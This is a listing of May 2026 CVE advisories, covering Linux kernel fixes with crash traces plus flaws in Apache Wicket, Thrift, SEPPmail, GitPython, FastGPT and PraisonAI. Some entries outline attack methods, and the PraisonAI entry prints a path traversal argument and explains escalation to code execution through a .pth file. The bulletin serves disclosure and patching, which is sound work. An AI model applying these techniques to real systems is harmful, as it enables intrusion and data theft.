| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc, afs: Fix missing error pointer check after rxrpc_kernel_lookup_peer() rxrpc_kernel_lookup_peer() can also return error pointers in addition to NULL, so just checking for NULL is not sufficient. Fix this by: (1) Changing rxrpc_kernel_lookup_peer() to return -ENOMEM rather than NULL on allocation failure. (2) Making the callers in afs use IS_ERR() and PTR_ERR() to pass on the error code returned. | 2026-05-08 | not yet calculated | CVE-2026-43463 | https://git.kernel.org/stable/c/d55fa7cd4b19ba91b34b307d769c149e56ad0a75 https://git.kernel.org/stable/c/54331c5dcc6d97683d7ca2788e7ef9c9505e1477 https://git.kernel.org/stable/c/4245a79003adf30e67f8e9060915bd05cb31d142 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix crash when moving to switchdev mode When moving to switchdev mode when the device doesn't support IPsec, we try to clean up the IPsec resources anyway which causes the crash below, fix that by correctly checking for IPsec support before trying to clean up its resources. [27642.515799] WARNING: arch/x86/mm/fault.c:1276 at do_user_addr_fault+0x18a/0x680, CPU#4: devlink/6490 [27642.517159] Modules linked in: xt_conntrack xt_MASQUERADE ip6table_nat ip6table_filter ip6_tables iptable_nat nf_nat xt_addrtype rpcsec_gss_krb5 auth_rpcgss oid_registry overlay mlx5_fwctl nfnetlink zram zsmalloc mlx5_ib fuse rpcrdma rdma_ucm ib_uverbs ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm mlx5_core ib_core [27642.521358] CPU: 4 UID: 0 PID: 6490 Comm: devlink Not tainted 6.19.0-rc5_for_upstream_min_debug_2026_01_14_16_47 #1 NONE [27642.522923] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [27642.524528] RIP: 0010:do_user_addr_fault+0x18a/0x680 [27642.525362] Code: ff 0f 84 75 03 00 00 48 89 ee 4c 89 e7 e8 5e b9 22 00 49 89 c0 48 85 c0 0f 84 a8 02 00 00 f7 c3 60 80 00 00 74 22 31 c9 eb ae <0f> 0b 48 83 c4 10 48 89 ea 48 89 de 4c 89 f7 5b 5d 41 5c 41 5d 41 [27642.528166] RSP: 0018:ffff88810770f6b8 EFLAGS: 00010046 [27642.529038] RAX: 0000000000000000 RBX: 0000000000000002 RCX: ffff88810b980f00 [27642.530158] RDX: 00000000000000a0 RSI: 0000000000000002 RDI: ffff88810770f728 [27642.531270] RBP: 00000000000000a0 R08: 0000000000000000 R09: 0000000000000000 [27642.532383] R10: 0000000000000000 R11: 0000000000000000 R12: ffff888103f3c4c0 [27642.533499] R13: 0000000000000000 R14: ffff88810770f728 R15: 0000000000000000 [27642.534614] FS: 00007f197c741740(0000) GS:ffff88856a94c000(0000) knlGS:0000000000000000 [27642.535915] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [27642.536858] CR2: 00000000000000a0 CR3: 000000011334c003 CR4: 0000000000172eb0 [27642.537982] Call Trace: [27642.538466] <TASK> [27642.538907] exc_page_fault+0x76/0x140 [27642.539583] asm_exc_page_fault+0x22/0x30 [27642.540282] RIP: 0010:_raw_spin_lock_irqsave+0x10/0x30 [27642.541134] Code: 07 85 c0 75 11 ba ff 00 00 00 f0 0f b1 17 75 06 b8 01 00 00 00 c3 31 c0 c3 90 0f 1f 44 00 00 53 9c 5b fa 31 c0 ba 01 00 00 00 <f0> 0f b1 17 75 05 48 89 d8 5b c3 89 c6 e8 7e 02 00 00 48 89 d8 5b [27642.543936] RSP: 0018:ffff88810770f7d8 EFLAGS: 00010046 [27642.544803] RAX: 0000000000000000 RBX: 0000000000000202 RCX: ffff888113ad96d8 [27642.545916] RDX: 0000000000000001 RSI: ffff88810770f818 RDI: 00000000000000a0 [27642.547027] RBP: 0000000000000098 R08: 0000000000000400 R09: ffff88810b980f00 [27642.548140] R10: 0000000000000001 R11: ffff888101845a80 R12: 00000000000000a8 [27642.549263] R13: ffffffffa02a9060 R14: 00000000000000a0 R15: ffff8881130d8a40 [27642.550379] complete_all+0x20/0x90 [27642.551010] mlx5e_ipsec_disable_events+0xb6/0xf0 [mlx5_core] [27642.552022] mlx5e_nic_disable+0x12d/0x220 [mlx5_core] [27642.552929] mlx5e_detach_netdev+0x66/0xf0 [mlx5_core] [27642.553822] mlx5e_netdev_change_profile+0x5b/0x120 [mlx5_core] [27642.554821] mlx5e_vport_rep_load+0x419/0x590 [mlx5_core] [27642.555757] ? xa_load+0x53/0x90 [27642.556361] __esw_offloads_load_rep+0x54/0x70 [mlx5_core] [27642.557328] mlx5_esw_offloads_rep_load+0x45/0xd0 [mlx5_core] [27642.558320] esw_offloads_enable+0xb4b/0xc90 [mlx5_core] [27642.559247] mlx5_eswitch_enable_locked+0x34e/0x4f0 [mlx5_core] [27642.560257] ? mlx5_rescan_drivers_locked+0x222/0x2d0 [mlx5_core] [27642.561284] mlx5_devlink_eswitch_mode_set+0x5ac/0x9c0 [mlx5_core] [27642.562334] ? devlink_rate_set_ops_supported+0x21/0x3a0 [27642.563220] devlink_nl_eswitch_set_doit+0x67/0xe0 [27642.564026] genl_family_rcv_msg_doit+0xe0/0x130 [27642.564816] genl_rcv_msg+0x183/0x290 [27642.565466] ? __devlink_nl_pre_doit.isra.0+0x160/0x160 [27642.566329] ? d ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43467 | https://git.kernel.org/stable/c/05c9a6df3646cdd25e0e10e6ef2d20cdba3ed8f9 https://git.kernel.org/stable/c/835778685f157b4fd4683b670cfe4010265bac60 https://git.kernel.org/stable/c/bc72f739f398d9d2e4f3d06f3f75fe98876d5579 https://git.kernel.org/stable/c/24b2795f9683e092dc22a68f487e7aaaf2ddafea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix deadlock between devlink lock and esw->wq esw->work_queue executes esw_functions_changed_event_handler -> esw_vfs_changed_event_handler and acquires the devlink lock. .eswitch_mode_set (acquires devlink lock in devlink_nl_pre_doit) -> mlx5_devlink_eswitch_mode_set -> mlx5_eswitch_disable_locked -> mlx5_eswitch_event_handler_unregister -> flush_workqueue deadlocks when esw_vfs_changed_event_handler executes. Fix that by no longer flushing the work to avoid the deadlock, and using a generation counter to keep track of work relevance. This avoids an old handler manipulating an esw that has undergone one or more mode changes: - the counter is incremented in mlx5_eswitch_event_handler_unregister. - the counter is read and passed to the ephemeral mlx5_host_work struct. - the work handler takes the devlink lock and bails out if the current generation is different than the one it was scheduled to operate on. - mlx5_eswitch_cleanup does the final draining before destroying the wq. No longer flushing the workqueue has the side effect of maybe no longer cancelling pending vport_change_handler work items, but that's ok since those are disabled elsewhere: - mlx5_eswitch_disable_locked disables the vport eq notifier. - mlx5_esw_vport_disable disarms the HW EQ notification and marks vport->enabled under state_lock to false to prevent pending vport handler from doing anything. - mlx5_eswitch_cleanup destroys the workqueue and makes sure all events are disabled/finished. | 2026-05-08 | not yet calculated | CVE-2026-43468 | https://git.kernel.org/stable/c/0de867f6e34eae6907b367fd152c55e61cb98608 https://git.kernel.org/stable/c/957d2a58f7f8ebcbdd0a85935e0d2675134b890d https://git.kernel.org/stable/c/3c7313cb41b1b427078440364d2f042c276a1c0b https://git.kernel.org/stable/c/4a7838bebc38374f74baaf88bf2cf8d439a92923 https://git.kernel.org/stable/c/90e7e5d14d0bd25ffd019a3aa39d9f1c05fedbe1 https://git.kernel.org/stable/c/aed763abf0e905b4b8d747d1ba9e172961572f57 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfs: return EISDIR on nfs3_proc_create if d_alias is a dir If we found an alias through nfs3_do_create/nfs_add_or_obtain /d_splice_alias which happens to be a dir dentry, we don't return any error, and simply forget about this alias, but the original dentry we were adding and passed as parameter remains negative. This later causes an oops on nfs_atomic_open_v23/finish_open since we supply a negative dentry to do_dentry_open. This has been observed running lustre-racer, where dirs and files are created/removed concurrently with the same name and O_EXCL is not used to open files (frequent file redirection). While d_splice_alias typically returns a directory alias or NULL, we explicitly check d_is_dir() to ensure that we don't attempt to perform file operations (like finish_open) on a directory inode, which triggers the observed oops. | 2026-05-08 | not yet calculated | CVE-2026-43470 | https://git.kernel.org/stable/c/7e2963773760a664684435201960dd2fb712f1b5 https://git.kernel.org/stable/c/203c792cb4315360d49973ae2e57feeb6d3dcf7e https://git.kernel.org/stable/c/9ee1770fcb2f1b48354622b926e7dc10222805f5 https://git.kernel.org/stable/c/410666a298c34ebd57256fde6b24c96bd23059a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Fix possible NULL pointer dereference in ufshcd_add_command_trace() The kernel log indicates a crash in ufshcd_add_command_trace, due to a NULL pointer dereference when accessing hwq->id. This can happen if ufshcd_mcq_req_to_hwq() returns NULL. This patch adds a NULL check for hwq before accessing its id field to prevent a kernel crash. Kernel log excerpt: [<ffffffd5d192dc4c>] notify_die+0x4c/0x8c [<ffffffd5d1814e58>] __die+0x60/0xb0 [<ffffffd5d1814d64>] die+0x4c/0xe0 [<ffffffd5d181575c>] die_kernel_fault+0x74/0x88 [<ffffffd5d1864db4>] __do_kernel_fault+0x314/0x318 [<ffffffd5d2a3cdf8>] do_page_fault+0xa4/0x5f8 [<ffffffd5d2a3cd34>] do_translation_fault+0x34/0x54 [<ffffffd5d1864524>] do_mem_abort+0x50/0xa8 [<ffffffd5d2a297dc>] el1_abort+0x3c/0x64 [<ffffffd5d2a29718>] el1h_64_sync_handler+0x44/0xcc [<ffffffd5d181133c>] el1h_64_sync+0x80/0x88 [<ffffffd5d255c1dc>] ufshcd_add_command_trace+0x23c/0x320 [<ffffffd5d255bad8>] ufshcd_compl_one_cqe+0xa4/0x404 [<ffffffd5d2572968>] ufshcd_mcq_poll_cqe_lock+0xac/0x104 [<ffffffd5d11c7460>] ufs_mtk_mcq_intr+0x54/0x74 [ufs_mediatek_mod] [<ffffffd5d19ab92c>] __handle_irq_event_percpu+0xc8/0x348 [<ffffffd5d19abca8>] handle_irq_event+0x3c/0xa8 [<ffffffd5d19b1f0c>] handle_fasteoi_irq+0xf8/0x294 [<ffffffd5d19aa778>] generic_handle_domain_irq+0x54/0x80 [<ffffffd5d18102bc>] gic_handle_irq+0x1d4/0x330 [<ffffffd5d1838210>] call_on_irq_stack+0x44/0x68 [<ffffffd5d183af30>] do_interrupt_handler+0x78/0xd8 [<ffffffd5d2a29c00>] el1_interrupt+0x48/0xa8 [<ffffffd5d2a29ba8>] el1h_64_irq_handler+0x14/0x24 [<ffffffd5d18113c4>] el1h_64_irq+0x80/0x88 [<ffffffd5d2527fb4>] arch_local_irq_enable+0x4/0x1c [<ffffffd5d25282e4>] cpuidle_enter+0x34/0x54 [<ffffffd5d195a678>] do_idle+0x1dc/0x2f8 [<ffffffd5d195a7c4>] cpu_startup_entry+0x30/0x3c [<ffffffd5d18155c4>] secondary_start_kernel+0x134/0x1ac [<ffffffd5d18640bc>] __secondary_switched+0xc4/0xcc | 2026-05-08 | not yet calculated | CVE-2026-43471 | https://git.kernel.org/stable/c/0614f5618c24fbc3d555efade22887b102ad7ad6 https://git.kernel.org/stable/c/be730f9ee92ae08f2bc4b336967bcfd8183c06fe https://git.kernel.org/stable/c/f4f590c6c9df7453bbda2ef9170b1b09e42a124c https://git.kernel.org/stable/c/93b9e7ee9e93629db80bbc9dab8a874215b89ccf https://git.kernel.org/stable/c/30df81f2228d65bddf492db3929d9fcaffd38fc5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: unshare: fix unshare_fs() handling There's an unpleasant corner case in unshare(2), when we have a CLONE_NEWNS in flags and current->fs hadn't been shared at all; in that case copy_mnt_ns() gets passed current->fs instead of a private copy, which causes interesting warts in proof of correctness] > I guess if private means fs->users == 1, the condition could still be true. Unfortunately, it's worse than just a convoluted proof of correctness. Consider the case when we have CLONE_NEWCGROUP in addition to CLONE_NEWNS (and current->fs->users == 1). We pass current->fs to copy_mnt_ns(), all right. Suppose it succeeds and flips current->fs->{pwd,root} to corresponding locations in the new namespace. Now we proceed to copy_cgroup_ns(), which fails (e.g. with -ENOMEM). We call put_mnt_ns() on the namespace created by copy_mnt_ns(), it's destroyed and its mount tree is dissolved, but... current->fs->root and current->fs->pwd are both left pointing to now detached mounts. They are pinning those, so it's not a UAF, but it leaves the calling process with unshare(2) failing with -ENOMEM _and_ leaving it with pwd and root on detached isolated mounts. The last part is clearly a bug. There is other fun related to that mess (races with pivot_root(), including the one between pivot_root() and fork(), of all things), but this one is easy to isolate and fix - treat CLONE_NEWNS as "allocate a new fs_struct even if it hadn't been shared in the first place". Sure, we could go for something like "if both CLONE_NEWNS *and* one of the things that might end up failing after copy_mnt_ns() call in create_new_namespaces() are set, force allocation of new fs_struct", but let's keep it simple - the cost of copy_fs_struct() is trivial. Another benefit is that copy_mnt_ns() with CLONE_NEWNS *always* gets a freshly allocated fs_struct, yet to be attached to anything. That seriously simplifies the analysis... FWIW, that bug had been there since the introduction of unshare(2) ;-/ | 2026-05-08 | not yet calculated | CVE-2026-43472 | https://git.kernel.org/stable/c/845bf3c6963a52096d0d3866e4a92db77a0c03d8 https://git.kernel.org/stable/c/d3ffc8f13034af895531a02c30b1fe3a34b46432 https://git.kernel.org/stable/c/d0d99f60538ddb4a62ccaac2168d8f448965f083 https://git.kernel.org/stable/c/d7963d6997fea86a6def242ac36198b86655f912 https://git.kernel.org/stable/c/aa9ebc084505fb26dd90f4d7a249045aad152043 https://git.kernel.org/stable/c/af8f4be3b68ac8caa41c8e5ead0eeaf5e85e42d0 https://git.kernel.org/stable/c/42e21e74061b0ebbd859839f81acf10efad02a27 https://git.kernel.org/stable/c/6c4b2243cb6c0755159bd567130d5e12e7b10d9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: mpi3mr: Add NULL checks when resetting request and reply queues The driver encountered a crash during resource cleanup when the reply and request queues were NULL due to freed memory. This issue occurred when the creation of reply or request queues failed, and the driver freed the memory first, but attempted to mem set the content of the freed memory, leading to a system crash. Add NULL pointer checks for reply and request queues before accessing the reply/request memory during cleanup | 2026-05-08 | not yet calculated | CVE-2026-43473 | https://git.kernel.org/stable/c/7df0296ad4e9253d12c6dbe7f120044dddc95600 https://git.kernel.org/stable/c/7da755e0d02e9ca035065127e108d1fed8950dc8 https://git.kernel.org/stable/c/78d3f201f8b609928eade53cf03a52df5415aaf7 https://git.kernel.org/stable/c/e978a36f332ede78eb4de037b517db16265d420d https://git.kernel.org/stable/c/220d7ca70611a73d50ef8e9edac630ed1ececb7c https://git.kernel.org/stable/c/fa96392ebebc8fade2b878acb14cce0f71016503 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: init flags_valid before calling vfs_fileattr_get syzbot reported a uninit-value bug in [1]. Similar to the "*get" context where the kernel's internal file_kattr structure is initialized before calling vfs_fileattr_get(), we should use the same mechanism when using fa. [1] BUG: KMSAN: uninit-value in fuse_fileattr_get+0xeb4/0x1450 fs/fuse/ioctl.c:517 fuse_fileattr_get+0xeb4/0x1450 fs/fuse/ioctl.c:517 vfs_fileattr_get fs/file_attr.c:94 [inline] __do_sys_file_getattr fs/file_attr.c:416 [inline] Local variable fa.i created at: __do_sys_file_getattr fs/file_attr.c:380 [inline] __se_sys_file_getattr+0x8c/0xbd0 fs/file_attr.c:372 | 2026-05-08 | not yet calculated | CVE-2026-43474 | https://git.kernel.org/stable/c/379e19e820dd1c6145426b97467728b3b89c0b42 https://git.kernel.org/stable/c/b8c182b2c8c44c6016b11d8af61715ad7ef958a1 https://git.kernel.org/stable/c/cb184dd19154fc486fa3d9e02afe70a97e54e055 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: storvsc: Fix scheduling while atomic on PREEMPT_RT This resolves the follow splat and lock-up when running with PREEMPT_RT enabled on Hyper-V: [ 415.140818] BUG: scheduling while atomic: stress-ng-iomix/1048/0x00000002 [ 415.140822] INFO: lockdep is turned off. [ 415.140823] Modules linked in: intel_rapl_msr intel_rapl_common intel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery pmt_class intel_pmc_ssram_telemetry intel_vsec ghash_clmulni_intel aesni_intel rapl binfmt_misc nls_ascii nls_cp437 vfat fat snd_pcm hyperv_drm snd_timer drm_client_lib drm_shmem_helper snd sg soundcore drm_kms_helper pcspkr hv_balloon hv_utils evdev joydev drm configfs efi_pstore nfnetlink vsock_loopback vmw_vsock_virtio_transport_common hv_sock vmw_vsock_vmci_transport vsock vmw_vmci efivarfs autofs4 ext4 crc16 mbcache jbd2 sr_mod sd_mod cdrom hv_storvsc serio_raw hid_generic scsi_transport_fc hid_hyperv scsi_mod hid hv_netvsc hyperv_keyboard scsi_common [ 415.140846] Preemption disabled at: [ 415.140847] [<ffffffffc0656171>] storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc] [ 415.140854] CPU: 8 UID: 0 PID: 1048 Comm: stress-ng-iomix Not tainted 6.19.0-rc7 #30 PREEMPT_{RT,(full)} [ 415.140856] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 09/04/2024 [ 415.140857] Call Trace: [ 415.140861] <TASK> [ 415.140861] ? storvsc_queuecommand+0x2e1/0xbe0 [hv_storvsc] [ 415.140863] dump_stack_lvl+0x91/0xb0 [ 415.140870] __schedule_bug+0x9c/0xc0 [ 415.140875] __schedule+0xdf6/0x1300 [ 415.140877] ? rtlock_slowlock_locked+0x56c/0x1980 [ 415.140879] ? rcu_is_watching+0x12/0x60 [ 415.140883] schedule_rtlock+0x21/0x40 [ 415.140885] rtlock_slowlock_locked+0x502/0x1980 [ 415.140891] rt_spin_lock+0x89/0x1e0 [ 415.140893] hv_ringbuffer_write+0x87/0x2a0 [ 415.140899] vmbus_sendpacket_mpb_desc+0xb6/0xe0 [ 415.140900] ? rcu_is_watching+0x12/0x60 [ 415.140902] storvsc_queuecommand+0x669/0xbe0 [hv_storvsc] [ 415.140904] ? HARDIRQ_verbose+0x10/0x10 [ 415.140908] ? __rq_qos_issue+0x28/0x40 [ 415.140911] scsi_queue_rq+0x760/0xd80 [scsi_mod] [ 415.140926] __blk_mq_issue_directly+0x4a/0xc0 [ 415.140928] blk_mq_issue_direct+0x87/0x2b0 [ 415.140931] blk_mq_dispatch_queue_requests+0x120/0x440 [ 415.140933] blk_mq_flush_plug_list+0x7a/0x1a0 [ 415.140935] __blk_flush_plug+0xf4/0x150 [ 415.140940] __submit_bio+0x2b2/0x5c0 [ 415.140944] ? submit_bio_noacct_nocheck+0x272/0x360 [ 415.140946] submit_bio_noacct_nocheck+0x272/0x360 [ 415.140951] ext4_read_bh_lock+0x3e/0x60 [ext4] [ 415.140995] ext4_block_write_begin+0x396/0x650 [ext4] [ 415.141018] ? __pfx_ext4_da_get_block_prep+0x10/0x10 [ext4] [ 415.141038] ext4_da_write_begin+0x1c4/0x350 [ext4] [ 415.141060] generic_perform_write+0x14e/0x2c0 [ 415.141065] ext4_buffered_write_iter+0x6b/0x120 [ext4] [ 415.141083] vfs_write+0x2ca/0x570 [ 415.141087] ksys_write+0x76/0xf0 [ 415.141089] do_syscall_64+0x99/0x1490 [ 415.141093] ? rcu_is_watching+0x12/0x60 [ 415.141095] ? finish_task_switch.isra.0+0xdf/0x3d0 [ 415.141097] ? rcu_is_watching+0x12/0x60 [ 415.141098] ? lock_release+0x1f0/0x2a0 [ 415.141100] ? rcu_is_watching+0x12/0x60 [ 415.141101] ? finish_task_switch.isra.0+0xe4/0x3d0 [ 415.141103] ? rcu_is_watching+0x12/0x60 [ 415.141104] ? __schedule+0xb34/0x1300 [ 415.141106] ? hrtimer_try_to_cancel+0x1d/0x170 [ 415.141109] ? do_nanosleep+0x8b/0x160 [ 415.141111] ? hrtimer_nanosleep+0x89/0x100 [ 415.141114] ? __pfx_hrtimer_wakeup+0x10/0x10 [ 415.141116] ? xfd_validate_state+0x26/0x90 [ 415.141118] ? rcu_is_watching+0x12/0x60 [ 415.141120] ? do_syscall_64+0x1e0/0x1490 [ 415.141121] ? do_syscall_64+0x1e0/0x1490 [ 415.141123] ? rcu_is_watching+0x12/0x60 [ 415.141124] ? do_syscall_64+0x1e0/0x1490 [ 415.141125] ? do_syscall_64+0x1e0/0x1490 [ 415.141127] ? irqentry_exit+0x140/0 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43475 | https://git.kernel.org/stable/c/cf00cb15f2515e38d3b7571bf6800b7c6ce70a84 https://git.kernel.org/stable/c/b82462af23e45e066dd56d2736ea70159a6ad647 https://git.kernel.org/stable/c/91ab59f76d0866079420ebff1c7959fcd87a242e https://git.kernel.org/stable/c/e7919a293f9b6101e38bde0d8613daea6c9955df https://git.kernel.org/stable/c/f8db760f4f52a73a022a3d6c84c488ead952a9b5 https://git.kernel.org/stable/c/c2e73d8acd056347a70047e6be7cd98e0e811dfa https://git.kernel.org/stable/c/c7984d196476adcbd51c0ce386d7e90277198d57 https://git.kernel.org/stable/c/57297736c08233987e5d29ce6584c6ca2a831b12 |
| Apache Software Foundation--Apache Wicket | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Wicket. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-43646 | https://lists.apache.org/thread/6zqcvjyz4lsqty1z2g5hg7pl5fqk88rs |
| Apache Software Foundation--Apache Thrift | Memory Allocation with Excessive Size Value vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-43868 | https://lists.apache.org/thread/zj76dtwnbbs1m7z3focf4wd51pqpsmn9 |
| Apache Software Foundation--Apache Thrift | Improper Validation of Certificate with Host Mismatch vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-43869 | https://lists.apache.org/thread/3hsgl1b69wzq3ry39scqbv2dhyl3j52r |
| Apache Software Foundation--Apache Thrift | Origin Validation Error, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting'), Uncontrolled Resource Consumption vulnerability in Apache Thrift. This issue affects Apache Thrift: before 0.23.0. Users are recommended to upgrade to version 0.23.0, which fixes the issue. | 2026-05-05 | not yet calculated | CVE-2026-43870 | https://lists.apache.org/thread/pgtfq44ltc9t63kxcbqmwqzt45pnhqdy |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. From versions 3.0.6 to before 3.8.15, electerm is vulnerable to arbitrary local code execution via deep links, CLI --opts, or crafted shortcuts. Exploit requires clicking a crafted electerm://... link or opening a crafted shortcut/command that launches electerm with attacker-controlled opts. This issue has been patched in version 3.8.15. | 2026-05-08 | not yet calculated | CVE-2026-43944 | https://github.com/electerm/electerm/security/advisories/GHSA-mpm8-cx2p-626q https://github.com/electerm/electerm/commit/8a6a17951e96d715f5a231532bbd8303fe208700 https://github.com/electerm/electerm/commit/a79e06f4a1f0ac6376c3d2411ef4690fa0377742 https://github.com/electerm/electerm/releases/tag/v3.8.15 |
| absinthe-graphql--absinthe | Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation. 'Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames':run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, &(&1.name == name)) - a full linear scan of the fragment list. The result is O(N²) comparisons per document, where N is the number of fragment definitions supplied by the caller. Because input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 × 10⁹ comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required. This issue affects absinthe: from 1.2.0 before 1.10.2. | 2026-05-08 | not yet calculated | CVE-2026-43967 | https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2 https://cna.erlef.org/cves/CVE-2026-43967.html https://osv.dev/vulnerability/EEF-CVE-2026-43967 https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d |
| Apache Software Foundation--Apache Wicket | FolderUploadsFileManager in Apache Wicket does not validate or sanitize the uploadFieldId parameter or the clientFileName before constructing file paths, allowing an unauthenticated attacker to write arbitrary files outside the intended upload directory or read files from arbitrary locations on the server. This issue affects Apache Wicket: from 8.0.0 through 8.17.0, from 9.0.0 through 9.22.0, from 10.0.0 through 10.8.0. Users are recommended to upgrade to version 10.9.0, which fixes the issue. | 2026-05-06 | not yet calculated | CVE-2026-43975 | https://github.com/apache/wicket/pull/1432 https://lists.apache.org/thread/xp2jrdk6ppv1zcmxb4w1mk2lg1dw3hbr |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 fails to enforce authorization checks for multiple endpoints in the new GINA UI, allowing unauthenticated remote attackers to access functionality that should require a valid session. | 2026-05-08 | not yet calculated | CVE-2026-44125 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 insecurely deserializes untrusted data, which can be reached from the new GINA UI and may allow unauthenticated remote attackers to execute code via a crafted serialized object. | 2026-05-08 | not yet calculated | CVE-2026-44126 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 contains an unauthenticated path traversal vulnerability in the identifier parameter of /api.app/attachment/preview that allows remote attackers to read arbitrary local files and trigger deletion of files in the targeted directory with the privileges of the api.app process. | 2026-05-08 | not yet calculated | CVE-2026-44127 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.2.1 allows unauthenticated remote code execution in the new GINA UI because an endpoint passes attacker-controlled input from a parameter to Perl's eval. | 2026-05-08 | not yet calculated | CVE-2026-44128 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| SEPPmail AG--Secure Email Gateway | SEPPmail Secure Email Gateway before version 15.0.4 contains a server-side template injection vulnerability in the new GINA UI because an endpoint accepts attacker-controlled template, allowing remote attackers to execute arbitrary template expressions and potentially achieve remote code execution depending on the enabled template plugins. | 2026-05-08 | not yet calculated | CVE-2026-44129 | https://downloads.seppmail.com/extrelnotes/150/ERN15.0.html#security |
| gitpython-developers--GitPython | GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository's .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48. | 2026-05-07 | not yet calculated | CVE-2026-44243 | https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24 https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48 |
| labring--FastGPT | FastGPT is an AI Agent building platform. Prior to version 4.14.17, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability allows attackers (or authenticated users with App editing privileges) to send arbitrary HTTP requests to internal/private network addresses. The fetchData function in the lafModule workflow node uses axios to fetch user-controlled URLs without validating them against the application's internal network blocklist guard (isInternalAddress), bypassing SSRF protections. This issue has been patched in version 4.14.17. | 2026-05-08 | not yet calculated | CVE-2026-44286 | https://github.com/labring/FastGPT/security/advisories/GHSA-xpx6-xcpf-76qg https://github.com/labring/FastGPT/releases/tag/v4.14.17 |
| The Document Foundation--LibreOffice | Out-of-bounds write vulnerability in The Document Foundation LibreOffice via crafted OOXML documents with mismatched encryption salt parameters. This issue affects LibreOffice: from 26.2 before 26.2.3, from 25.8 before 25.8.7. | 2026-05-07 | not yet calculated | CVE-2026-4430 | https://www.libreoffice.org/about-us/security/advisories/cve-2026-4430 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 1.6.32, the URL checking logic in PraisonAI has a logical flaw that could be bypassed by attackers, leading to SSRF attacks. This issue has been patched in version 1.6.32. | 2026-05-08 | not yet calculated | CVE-2026-44335 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q9pw-vmhh-384g |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 4.6.34, PraisonAI's MCP (Model Context Protocol) server (praisonai mcp serve) registers four file-handling tools by default - praisonai.rules.create, praisonai.rules.show, praisonai.rules.delete, and praisonai.workflow.show. Each accepts a path or filename string from MCP tools/call arguments and joins it onto ~/.praison/rules/ (or, for workflow.show, accepts an absolute path) with no containment check. The JSON-RPC dispatcher passes params["arguments"] blind to each handler via **kwargs without validating against the advertised input schema. By setting rule_name="../../<some-path>" an attacker walks out of the rules directory and writes any file the running user can write. Dropping a Python .pth file into the user site-packages directory escalates this primitive to arbitrary code execution in any subsequent Python process the user spawns - the next praisonai CLI invocation, an IDE script run, the user's python REPL, or any background Python service. This issue has been patched in version 4.6.34. | 2026-05-08 | not yet calculated | CVE-2026-44336 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9mqq-jqxf-grvw |
